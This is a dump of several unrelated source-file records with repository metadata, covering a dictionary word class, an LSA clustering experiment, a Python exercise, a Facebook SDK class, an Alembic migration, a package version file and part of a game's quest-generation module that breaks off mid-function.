277ca5faf223fee0254b99c950487e402e63cb75 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_untruth.py | f82b360189c64e1e50c3124e3fe683bea2162f45 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py |
#calss header
class _UNTRUTH():
def __init__(self,):
self.name = "UNTRUTH"
self.definitions = [u'a statement that is not true: ', u'the fact that something is not true: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
]
| |
97698fdcf4861c65a25ec9893aa57e5b52a06063 | b6b2be9866fd16699ad5c30a21bbcb70755f1e57 | /Experiments/_Legacy/Chicago/PartitionByDocThenClusterUsingLsa.py | 6e174934f81ca58b1b992fbc3c3f4391ac23815f | []
| no_license | simonhughes22/PythonNlpResearch | 24a482c7036c568b063ec099176b393d45a0a86b | 2bc2914ce93fcef6dbd26f8097eec20b7d0e476d | refs/heads/master | 2022-12-08T17:39:18.332177 | 2019-10-26T12:48:33 | 2019-10-26T12:48:33 | 16,458,105 | 17 | 7 | null | 2022-12-07T23:38:17 | 2014-02-02T16:36:39 | Jupyter Notebook | UTF-8 | Python | false | false | 4,135 | py | import Clusterer
import ClustersToFile
import SentenceData
import ListHelper
import Lsa
import MatrixHelper
import TfIdf
import WordTokenizer
import logging
import PartitionByCode
import CosineSimilarity
import collections
def find_closest_document(txtMatrixByCode, row):
    """ Return the code of the document most similar to the given LSA row.

        txtMatrixByCode maps each document code to that document's LSA
        matrix (a list of row vectors).  Similarity of `row` to a document
        is the mean cosine similarity against the document's rows; the
        code with the highest mean wins.  An empty row yields the
        sentinel "ERROR".
    """
    if len(row) == 0:
        return "ERROR"
    mean_sim_by_code = {}
    for code in txtMatrixByCode:
        doc_rows = txtMatrixByCode[code]
        total_sim = 0.0
        for candidate in doc_rows:
            total_sim += CosineSimilarity.cosine_similarity(row, candidate)
        mean_sim_by_code[code] = total_sim / len(doc_rows)
    # Highest mean similarity wins; ties keep the first-seen code, which
    # matches the previous stable reverse-sort-then-take-first behaviour.
    return max(mean_sim_by_code.items(), key=lambda item: item[1])[0]
def train(num_lsa_topics, k):
    """Tokenize the corpus, project it into an LSA space of
    num_lsa_topics dimensions, assign each "sm code" row to its closest
    source document, k-means cluster the rows within each document, and
    write the resulting cluster/label assignments to CSV files.

    k is the TOTAL cluster budget; it is divided evenly across the
    source documents (text codes).
    """
    logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
    #TOKENIZE
    xs = SentenceData.SentenceData()
    tokenizer = WordTokenizer.WordTokenizer(min_word_count = 5)
    tokenized_docs = tokenizer.tokenize(xs.documents)
    #MAP TO VECTOR AND SEMANTIC SPACE
    tfidf = TfIdf.TfIdf(tokenized_docs)
    lsa = Lsa.Lsa(tfidf, num_topics = num_lsa_topics)
    full_lsa_matrix = MatrixHelper.gensim_to_python_mdarray(lsa.distance_matrix, num_lsa_topics)
    #TODO Partition into Docs by LSA sim
    txt_codes = xs.text_codes
    # Split the total cluster budget k evenly across the source documents.
    clusters_per_text_code = int(round( k/ float((len(txt_codes)))))
    #Extract the sm code rows from LSA
    smCodeRows = ListHelper.filter_list_by_index(full_lsa_matrix, xs.sm_code_indices)
    smCodeClassifications = ListHelper.filter_list_by_index(xs.codes_per_document, xs.sm_code_indices)
    smCodeCategoryClassifications = ListHelper.filter_list_by_index(xs.categories_per_document, xs.sm_code_indices)
    # Dict of <code, list[list]]> - LSA row vectors
    logging.info("Partitioning LSA distance_matrix by Source Document")
    txtMatrixByCode = PartitionByCode.partition(full_lsa_matrix, xs, xs.text_codes)
    # Assign every sm-code row to the document whose LSA rows it is most
    # similar to (mean cosine similarity; see find_closest_document).
    closest_docs = [find_closest_document(txtMatrixByCode, row) for row in smCodeRows]
    matrix_by_doc = collections.defaultdict(list)
    for i, doc in enumerate(closest_docs):
        matrix_by_doc[doc].append(smCodeRows[i])
    #Stores all cluster labels
    logging.info("Clustering within a document")
    all_smcode_labels = []
    label_offset = 0
    for doc in xs.text_codes:
        distance_matrix = matrix_by_doc[doc]
        #CLUSTER
        clusterer = Clusterer.Clusterer(clusters_per_text_code)
        labels = clusterer.Run(distance_matrix)
        # Offset per-document labels so cluster ids are globally unique.
        all_smcode_labels = all_smcode_labels + [int(l + label_offset) for l in labels]
        label_offset += clusters_per_text_code
    #OUTPUT
    file_name_code_clusters = "Partition_By_Doc_LSA_SMCODES_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
    ClustersToFile.clusters_to_file(file_name_code_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
    file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
    ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeCategoryClassifications, "Chicago")
    #TODO - filter the category and the docs per docs to the sm codes and output
    #file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.txt".format(k, num_lsa_topics)
    #ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
    print "Finished processing lsa clustering for dims: {0} and k: {1}".format(num_lsa_topics, k)
if __name__ == "__main__":
#k = cluster size
#for k in range(40,41,1): #start, end, increment size
# train(300, k)
train(num_lsa_topics = 300, k = 30) | [
"[email protected]"
]
| |
2408590522753e9cd86637c0677554589f285d76 | c9d4d4c78703d009da11999e4e59b6a168a454a2 | /examples/Learning Python The Hard Way/ex11_AskingQuestions.py | be33a059dc6c1cfcccb68bbc63af5f196c02ccc2 | [
"MIT"
]
| permissive | AkiraKane/Python | 23df49d7f7ae0f375e0b4ccfe4e1b6a077b1a52b | 12e2dcb9a61e9ab0fc5706e4a902c48e6aeada30 | refs/heads/master | 2020-12-11T07:20:01.524438 | 2015-11-07T12:42:22 | 2015-11-07T12:42:22 | 47,440,128 | 1 | 0 | null | 2015-12-05T03:15:52 | 2015-12-05T03:15:51 | null | UTF-8 | Python | false | false | 335 | py | '''
Created on 2013-8-14
@author: Kelly Chan
Python Version: V3.3
Book: Learn Python The Hard Way
Ex11: Asking Questions
'''
# Prompt for three free-form answers; input() returns strings, which the
# script later interpolates with %r (showing the repr, quotes included).
print("How old are you?")
age = input()
print("How tall are you?")
height = input()
print("How much do you weigh?")
weight = input()
print("So, you're %r old, %r tall and %r heavy." % (age, height, weight)) | [
"[email protected]"
]
| |
238ec91f069f7201b85bb750838f5ebd9b18ecd9 | ce083128fa87ca86c65059893aa8882d088461f5 | /python/pytest-labs/.venv/lib/python3.6/site-packages/facebook_business/adobjects/productdaeventsamplesbatch.py | 6155974b1405f7c8bc729960a751f6b815d8bc6d | []
| no_license | marcosptf/fedora | 581a446e7f81d8ae9a260eafb92814bc486ee077 | 359db63ff1fa79696b7bc803bcfa0042bff8ab44 | refs/heads/master | 2023-04-06T14:53:40.378260 | 2023-03-26T00:47:52 | 2023-03-26T00:47:52 | 26,059,824 | 6 | 5 | null | 2022-12-08T00:43:21 | 2014-11-01T18:48:56 | null | UTF-8 | Python | false | false | 2,489 | py | # Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from facebook_business.adobjects.abstractobject import AbstractObject
"""
This class is auto-generated.
For any issues or feature requests related to this class, please let us know on
github and we'll fix in our codegen framework. We'll not be able to accept
pull request for this class.
"""
class ProductDaEventSamplesBatch(
    AbstractObject,
):
    """Graph-API object for a batch of product DA (dynamic ads) event
    samples.

    Auto-generated by the SDK's codegen framework (see the file header):
    field names and enum values mirror the API schema, so the structure
    should not be hand-edited.
    """
    def __init__(self, api=None):
        super(ProductDaEventSamplesBatch, self).__init__()
        self._isProductDaEventSamplesBatch = True
        self._api = api
    class Field(AbstractObject.Field):
        # API field names exposed by this object.
        samples = 'samples'
        time_start = 'time_start'
        time_stop = 'time_stop'
    class AggregationType:
        # Allowed values for the aggregation_type enum.
        content_id = 'CONTENT_ID'
        content_url = 'CONTENT_URL'
    class Event:
        # Allowed values for the event enum.
        viewcontent = 'ViewContent'
        addtocart = 'AddToCart'
        purchase = 'Purchase'
        initiatecheckout = 'InitiateCheckout'
        search = 'Search'
        lead = 'Lead'
        addtowishlist = 'AddToWishlist'
    # Field name -> API type string; presumably consumed by the SDK's
    # (de)serialization machinery — confirm against AbstractObject.
    _field_types = {
        'samples': 'list<Object>',
        'time_start': 'unsigned int',
        'time_stop': 'unsigned int',
    }
    @classmethod
    def _get_field_enum_info(cls):
        """Return {enum name: allowed values} for this object's enums."""
        field_enum_info = {}
        field_enum_info['AggregationType'] = ProductDaEventSamplesBatch.AggregationType.__dict__.values()
        field_enum_info['Event'] = ProductDaEventSamplesBatch.Event.__dict__.values()
        return field_enum_info
| [
"[email protected]"
]
| |
4637ad8e57ec88e45fda29f4a08e4b0144d0f669 | f0e11aeb7b5bd96c828cf39728eb2fa523f320df | /snapflow/migrations/versions/7d5638b5d74d_initial_migration.py | 8b85094b11b08e55368d3320bb0b4bdb56eecc13 | [
"BSD-3-Clause"
]
| permissive | sathya-reddy-m/snapflow | 7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db | 9e9e73f0d5a3d6b92f528ef1e2840ad92582502e | refs/heads/master | 2023-05-01T05:14:08.479073 | 2021-05-21T00:14:56 | 2021-05-21T00:14:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,528 | py | """Initial migration
Revision ID: 7d5638b5d74d
Revises:
Create Date: 2021-05-17 20:55:42.613348
"""
import snapflow
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7d5638b5d74d"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial snapflow metadata tables.

    Tables: data block metadata + its stored copies and aliases,
    function/data-block execution logs, generated schemas, and per-node
    state.  Bodies are Alembic-autogenerated; adjust with care so the
    migration stays consistent with the ORM models.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table(
        "_snapflow_data_block_metadata",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.String(length=128), nullable=False),
        sa.Column("inferred_schema_key", sa.String(length=128), nullable=True),
        sa.Column("nominal_schema_key", sa.String(length=128), nullable=True),
        sa.Column("realized_schema_key", sa.String(length=128), nullable=False),
        sa.Column("record_count", sa.Integer(), nullable=True),
        sa.Column("created_by_node_key", sa.String(length=128), nullable=True),
        sa.Column("deleted", sa.Boolean(), nullable=True),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_data_function_log",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("node_key", sa.String(length=128), nullable=False),
        sa.Column("node_start_state", sa.JSON(), nullable=True),
        sa.Column("node_end_state", sa.JSON(), nullable=True),
        sa.Column("function_key", sa.String(length=128), nullable=False),
        sa.Column("function_params", sa.JSON(), nullable=True),
        sa.Column("runtime_url", sa.String(length=128), nullable=True),
        sa.Column("queued_at", sa.DateTime(), nullable=True),
        sa.Column("started_at", sa.DateTime(), nullable=True),
        sa.Column("completed_at", sa.DateTime(), nullable=True),
        sa.Column("error", sa.JSON(), nullable=True),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_generated_schema",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("key", sa.String(length=128), nullable=False),
        sa.Column("definition", sa.JSON(), nullable=True),
        sa.PrimaryKeyConstraint("key"),
    )
    op.create_table(
        "_snapflow_node_state",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("node_key", sa.String(length=128), nullable=True),
        sa.Column("state", sa.JSON(), nullable=True),
        sa.PrimaryKeyConstraint("id"),
        sa.UniqueConstraint("env_id", "node_key"),
    )
    # The two tables below reference the metadata/log tables created above.
    op.create_table(
        "_snapflow_data_block_log",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("function_log_id", sa.Integer(), nullable=False),
        sa.Column("data_block_id", sa.String(length=128), nullable=False),
        sa.Column("stream_name", sa.String(length=128), nullable=True),
        sa.Column(
            "direction",
            sa.Enum("INPUT", "OUTPUT", name="direction", native_enum=False),
            nullable=False,
        ),
        sa.Column("processed_at", sa.DateTime(), nullable=False),
        sa.Column("invalidated", sa.Boolean(), nullable=True),
        sa.ForeignKeyConstraint(
            ["data_block_id"],
            ["_snapflow_data_block_metadata.id"],
        ),
        sa.ForeignKeyConstraint(
            ["function_log_id"],
            ["_snapflow_data_function_log.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_stored_data_block_metadata",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.String(length=128), nullable=False),
        sa.Column("name", sa.String(length=128), nullable=True),
        sa.Column("data_block_id", sa.String(length=128), nullable=False),
        sa.Column("storage_url", sa.String(length=128), nullable=False),
        sa.Column(
            "data_format",
            snapflow.core.metadata.orm.DataFormatType(length=128),
            nullable=False,
        ),
        sa.ForeignKeyConstraint(
            ["data_block_id"],
            ["_snapflow_data_block_metadata.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
    )
    op.create_table(
        "_snapflow_alias",
        sa.Column("env_id", sa.String(length=64), nullable=True),
        sa.Column("created_at", sa.DateTime(), nullable=True),
        sa.Column("updated_at", sa.DateTime(), nullable=True),
        sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
        sa.Column("name", sa.String(length=128), nullable=True),
        sa.Column("data_block_id", sa.String(length=128), nullable=False),
        sa.Column("stored_data_block_id", sa.String(length=128), nullable=False),
        sa.ForeignKeyConstraint(
            ["data_block_id"],
            ["_snapflow_data_block_metadata.id"],
        ),
        sa.ForeignKeyConstraint(
            ["stored_data_block_id"],
            ["_snapflow_stored_data_block_metadata.id"],
        ),
        sa.PrimaryKeyConstraint("id"),
        sa.UniqueConstraint("env_id", "name"),
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop all tables created by upgrade(), children before parents so
    foreign-key constraints are not violated."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table("_snapflow_alias")
    op.drop_table("_snapflow_stored_data_block_metadata")
    op.drop_table("_snapflow_data_block_log")
    op.drop_table("_snapflow_node_state")
    op.drop_table("_snapflow_generated_schema")
    op.drop_table("_snapflow_data_function_log")
    op.drop_table("_snapflow_data_block_metadata")
    # ### end Alembic commands ###
| [
"[email protected]"
]
| |
867c39b81f0bd2f14694cd585a733a351b7c50fa | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_spinier.py | 0482c9921fbb9ca2d0ffe46b31b1181f2f50e5f1 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py |
from xai.brain.wordbase.adjectives._spiny import _SPINY
#calss header
class _SPINIER(_SPINY, ):
    """Comparative form "spinier": inherits its behaviour from the base
    lemma entry _SPINY and only overrides the surface-form metadata."""
    def __init__(self,):
        # Initialise the base "spiny" entry first, then record this form.
        _SPINY.__init__(self)
        self.name = "SPINIER"
        self.basic = "spiny"
        self.specie = 'adjectives'
        self.jsondata = {}
| [
"[email protected]"
]
| |
00a109d7ceb3af65458a2708817bd3fcbd90c405 | 38f19ae4963df9be7a851458e63ffb94d824eb03 | /stellar_sdk/__version__.py | 328854e119791d65c471bc64c026b784c86512b9 | [
"Apache-2.0"
]
| permissive | brunodabo/py-stellar-base | e033da687e3a2a76076cfed88e82c7951ae4e57e | 7897a23bc426324cb389a7cdeb695dfce10a673f | refs/heads/master | 2022-11-05T12:35:37.140735 | 2020-06-03T13:41:30 | 2020-06-03T13:54:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | """
_____ _______ ______ _ _ _____ _____ _____ _ __
/ ____|__ __| ____| | | | /\ | __ \ / ____| __ \| |/ /
| (___ | | | |__ | | | | / \ | |__) |____| (___ | | | | ' /
\___ \ | | | __| | | | | / /\ \ | _ /______\___ \| | | | <
____) | | | | |____| |____| |____ / ____ \| | \ \ ____) | |__| | . \
|_____/ |_| |______|______|______/_/ \_\_| \_\ |_____/|_____/|_|\_\
"""
# Package metadata, kept as module-level dunders so packaging tools and
# runtime code can introspect them (e.g. stellar_sdk.__version__).
__title__ = "stellar-sdk"
__description__ = "The Python Stellar SDK library provides APIs to build transactions and connect to Horizon."
__url__ = "https://github.com/StellarCN/py-stellar-base"
__issues__ = f"{__url__}/issues"  # issue tracker derived from the repo URL
__version__ = "2.5.2"
__author__ = "Eno, overcat"
__author_email__ = "[email protected], [email protected]"
__license__ = "Apache License 2.0"
| [
"[email protected]"
]
| |
5440c399fc472d9aec6c0adc203267a050e8c7d0 | 747febe786dd6b7fd6c63cfe73dbe3023354daa8 | /src/the_tale/the_tale/game/quests/logic.py | 69a11b9a515ce9d1b4452b825829a94900ea8fa3 | [
"BSD-3-Clause"
]
| permissive | the-tale/the-tale | 4e4b8d91dc873a5fb935fe58e9721a877baa6d3f | e8450bd2332344da805b1851e728da5a3e5bf0ef | refs/heads/develop | 2023-08-01T13:53:46.835667 | 2022-12-25T18:04:56 | 2022-12-25T18:04:56 | 1,949,167 | 98 | 52 | BSD-3-Clause | 2023-02-15T18:57:33 | 2011-06-24T18:49:48 | Python | UTF-8 | Python | false | false | 27,529 | py |
import smart_imports
smart_imports.all()
# Structural checks applied to the generated world description
# (object/location integrity).
WORLD_RESTRICTIONS = [questgen_restrictions.SingleLocationForObject(),
                      questgen_restrictions.ReferencesIntegrity()]
# Invariants a generated quest graph must satisfy — judging by the
# questgen restriction names: a single start state, a reachable finish,
# a connected acyclic jump graph, and consistent choices/questions/
# finish results.
QUEST_RESTRICTIONS = [questgen_restrictions.SingleStartStateWithNoEnters(),
                      questgen_restrictions.FinishStateExists(),
                      questgen_restrictions.AllStatesHasJumps(),
                      questgen_restrictions.ConnectedStateJumpGraph(),
                      questgen_restrictions.NoCirclesInStateJumpGraph(),
                      questgen_restrictions.MultipleJumpsFromNormalState(),
                      questgen_restrictions.ChoicesConsistency(),
                      questgen_restrictions.QuestionsConsistency(),
                      questgen_restrictions.FinishResultsConsistency()]
# Registry of every quest implementation, filled from the QUESTS relation.
QUESTS_BASE = questgen_quests_quests_base.QuestsBase()
QUESTS_BASE += [quest.quest_class for quest in relations.QUESTS.records]
class HeroQuestInfo(object):
    """Serializable snapshot of the hero state needed for quest generation.

    Instances are built by ``create_hero_info`` in the game process and
    shipped (via ``serialize``/``deserialize``) to the quest-generator
    worker, so every stored attribute must be a plain, JSON-friendly value.
    """

    __slots__ = ('id',
                 'level',
                 'position_place_id',
                 'is_first_quest_path_required',
                 'preferences_mob_id',
                 'preferences_place_id',
                 'preferences_friend_id',
                 'preferences_enemy_id',
                 'preferences_equipment_slot',
                 'preferences_quests_region_id',
                 'preferences_quests_region_size',
                 'interfered_persons',
                 'quests_priorities',
                 'excluded_quests',
                 'prefered_quest_markers')

    def __init__(self,
                 id,
                 level,
                 position_place_id,
                 is_first_quest_path_required,
                 preferences_mob_id,
                 preferences_place_id,
                 preferences_friend_id,
                 preferences_enemy_id,
                 preferences_equipment_slot,
                 preferences_quests_region_id,
                 preferences_quests_region_size,
                 interfered_persons,
                 quests_priorities,
                 excluded_quests,
                 prefered_quest_markers):
        self.id = id
        self.level = level
        self.position_place_id = position_place_id
        self.is_first_quest_path_required = is_first_quest_path_required
        self.preferences_mob_id = preferences_mob_id
        self.preferences_place_id = preferences_place_id
        self.preferences_friend_id = preferences_friend_id
        self.preferences_enemy_id = preferences_enemy_id
        self.preferences_equipment_slot = preferences_equipment_slot
        self.preferences_quests_region_id = preferences_quests_region_id
        self.preferences_quests_region_size = preferences_quests_region_size
        self.interfered_persons = interfered_persons
        self.quests_priorities = quests_priorities
        self.excluded_quests = excluded_quests
        self.prefered_quest_markers = prefered_quest_markers

    @property
    def position_place(self):
        # Resolved lazily: the places storage is only available inside game
        # processes, not in the worker that deserialized this info.
        return places_storage.places[self.position_place_id]

    def serialize(self):
        """Return a JSON-friendly dict representation of this info.

        Enum-valued fields are stored by ``.value``; sets are sorted so two
        equal infos always serialize identically (``__eq__`` compares the
        serialized forms).
        """
        return {'id': self.id,
                'level': self.level,
                'position_place_id': self.position_place_id,
                'is_first_quest_path_required': self.is_first_quest_path_required,
                'preferences_mob_id': self.preferences_mob_id,
                'preferences_place_id': self.preferences_place_id,
                'preferences_friend_id': self.preferences_friend_id,
                'preferences_enemy_id': self.preferences_enemy_id,
                'preferences_equipment_slot': self.preferences_equipment_slot.value if self.preferences_equipment_slot else None,
                # BUGFIX: store the id as-is; the old ``x if x else None``
                # expression turned a legal id of 0 into None.
                'preferences_quests_region_id': self.preferences_quests_region_id,
                'preferences_quests_region_size': self.preferences_quests_region_size,
                'interfered_persons': self.interfered_persons,
                'quests_priorities': [(quest_type.value, priority) for quest_type, priority in self.quests_priorities],
                'excluded_quests': list(sorted(self.excluded_quests)),
                'prefered_quest_markers': list(sorted(self.prefered_quest_markers))}

    @classmethod
    def deserialize(cls, data):
        """Rebuild a HeroQuestInfo from the output of ``serialize``."""
        return cls(id=data['id'],
                   level=data['level'],
                   position_place_id=data['position_place_id'],
                   is_first_quest_path_required=data['is_first_quest_path_required'],
                   preferences_mob_id=data['preferences_mob_id'],
                   preferences_place_id=data['preferences_place_id'],
                   preferences_friend_id=data['preferences_friend_id'],
                   preferences_enemy_id=data['preferences_enemy_id'],
                   preferences_equipment_slot=heroes_relations.EQUIPMENT_SLOT(data['preferences_equipment_slot']) if data['preferences_equipment_slot'] is not None else None,
                   preferences_quests_region_id=data['preferences_quests_region_id'],
                   preferences_quests_region_size=data['preferences_quests_region_size'],
                   interfered_persons=data['interfered_persons'],
                   quests_priorities=[(relations.QUESTS(quest_type), priority) for quest_type, priority in data['quests_priorities']],
                   excluded_quests=set(data['excluded_quests']),
                   prefered_quest_markers=set(data['prefered_quest_markers']))

    def __eq__(self, other):
        # Equality is defined as "serializes to the same payload".
        return self.serialize() == other.serialize()

    # BUGFIX: the inequality hook is ``__ne__``; the previous ``__neq__``
    # spelling was never invoked by ``!=``.  The old name is kept below as an
    # alias for any explicit callers.
    def __ne__(self, other):
        return not self.__eq__(other)

    __neq__ = __ne__
def choose_quest_path_url():
    """Return the versioned API url a player uses to choose a quest path."""
    params = {'api_version': '1.0', 'api_client': django_settings.API_CLIENT}
    return utils_urls.url('game:quests:api-choose', **params)
def fact_place(place):
    """Build a questgen Place fact for *place*, carrying its terrains and quest type."""
    return questgen_facts.Place(uid=uids.place(place.id),
                                terrains=[terrain.value for terrain in map_storage.cells.place_terrains(place.id)],
                                externals={'id': place.id},
                                type=place.modifier_quest_type())
def fact_mob(mob):
    """Build a questgen Mob fact for *mob* with the terrains it inhabits."""
    return questgen_facts.Mob(uid=uids.mob(mob.id),
                              terrains=[terrain.value for terrain in mob.terrains],
                              externals={'id': mob.id})
def fact_person(person):
    """Build a questgen Person fact for *person* (a regular city-person actor)."""
    return questgen_facts.Person(uid=uids.person(person.id),
                                 profession=person.type.quest_profession,
                                 externals={'id': person.id,
                                            'type': game_relations.ACTOR.PERSON.value})
def fact_emissary(emissary):
    """Build a questgen Person fact for *emissary*; emissaries carry no profession."""
    return questgen_facts.Person(uid=uids.emissary(emissary.id),
                                 profession=None,
                                 externals={'id': emissary.id,
                                            'type': game_relations.ACTOR.EMISSARY.value})
def fact_social_connection(connection_type, person_uid, connected_person_uid):
    """Build a questgen SocialConnection fact linking two person uids."""
    return questgen_facts.SocialConnection(person_to=person_uid,
                                           person_from=connected_person_uid,
                                           type=connection_type.questgen_type)
def fact_located_in(person):
    """Build a LocatedIn fact placing *person* in their home place."""
    return questgen_facts.LocatedIn(object=uids.person(person.id), place=uids.place(person.place.id))
def fill_places(kb, places):
    """Add a place fact to *kb* for every place not already represented there."""
    for place in places:
        if uids.place(place.id) not in kb:
            kb += fact_place(place)
def setup_places(kb, hero_info):
    """Fill *kb* with the places available for the quest and locate the hero.

    The region is centered on the hero's position or, when set, on the hero's
    quests-region preference; first quests are forced onto a two-place region.
    """
    center_place_id = hero_info.position_place_id
    quests_region_size = hero_info.preferences_quests_region_size
    if hero_info.preferences_quests_region_id is not None:
        center_place_id = hero_info.preferences_quests_region_id
    if hero_info.is_first_quest_path_required:
        # keep the hero's first quest short: only the two nearest places
        quests_region_size = 2
    places = places_storage.places.nearest_places(center_place_id,
                                                  number=quests_region_size)
    if len(places) < 2:
        # a quest needs at least two places to travel between
        places = places_storage.places.all()
    fill_places(kb, places)
    hero_position_uid = uids.place(hero_info.position_place_id)
    if hero_position_uid not in kb:
        # the hero's place may lie outside the chosen region — add it explicitly
        kb += fact_place(places_storage.places[hero_info.position_place_id])
    kb += questgen_facts.LocatedIn(object=uids.hero(hero_info.id), place=hero_position_uid)
def setup_person(kb, person):
    """Ensure *person* (and their home place) is in *kb*; return the person fact."""
    if uids.place(person.place.id) not in kb:
        kb += fact_place(person.place)
    person_uid = uids.person(person.id)
    if person_uid in kb:
        # already registered — return the existing fact
        return kb[person_uid]
    f_person = fact_person(person)
    kb += f_person
    kb += fact_located_in(person)
    return f_person
def setup_persons(kb, hero_info):
    """Register in *kb* every person whose home place is already known to it."""
    for person in persons_storage.persons.all():
        if uids.place(person.place.id) in kb:
            setup_person(kb, person)
def setup_social_connections(kb):
    """Add social-connection facts between the persons already present in *kb*."""
    # index only real persons (not emissaries) that are in the knowledge base
    persons_in_kb = {f_person.externals['id']: f_person.uid
                     for f_person in kb.filter(questgen_facts.Person)
                     if f_person.externals['type'] == game_relations.ACTOR.PERSON.value}
    for person_id, person_uid in persons_in_kb.items():
        person = persons_storage.persons[person_id]
        for connection_type, connected_person_id in persons_storage.social_connections.get_person_connections(person):
            if connected_person_id not in persons_in_kb:
                # connections leading outside the knowledge base are ignored
                continue
            kb += fact_social_connection(connection_type, person_uid, persons_in_kb[connected_person_id])
def setup_preferences(kb, hero_info):
    """Add the hero's preference facts (mob, hometown, friend, enemy, equipment
    slot) to the knowledge base *kb*.

    Any mob/place/person a preference refers to is registered in *kb* first
    when missing.
    """
    hero_uid = uids.hero(hero_info.id)

    if hero_info.preferences_mob_id is not None:
        f_mob = fact_mob(mobs_storage.mobs[hero_info.preferences_mob_id])
        if f_mob.uid not in kb:
            kb += f_mob
        kb += questgen_facts.PreferenceMob(object=hero_uid, mob=f_mob.uid)

    if hero_info.preferences_place_id is not None:
        f_place = fact_place(places_storage.places[hero_info.preferences_place_id])
        if f_place.uid not in kb:
            kb += f_place
        kb += questgen_facts.PreferenceHometown(object=hero_uid, place=f_place.uid)

    if hero_info.preferences_friend_id is not None:
        friend = persons_storage.persons[hero_info.preferences_friend_id]
        f_person = setup_person(kb, friend)
        kb += questgen_facts.PreferenceFriend(object=hero_uid, person=f_person.uid)
        # a friend must never suffer a bad quest outcome
        kb += questgen_facts.ExceptBadBranches(object=f_person.uid)

    # BUGFIX: compare with ``is not None`` like the sibling branches do, so an
    # enemy whose id is 0 is not silently skipped by a truthiness test.
    if hero_info.preferences_enemy_id is not None:
        enemy = persons_storage.persons[hero_info.preferences_enemy_id]
        kb += questgen_facts.PreferenceEnemy(object=hero_uid, person=setup_person(kb, enemy).uid)
        # an enemy must never profit from a good quest outcome
        kb += questgen_facts.ExceptGoodBranches(object=setup_person(kb, enemy).uid)

    if hero_info.preferences_equipment_slot:
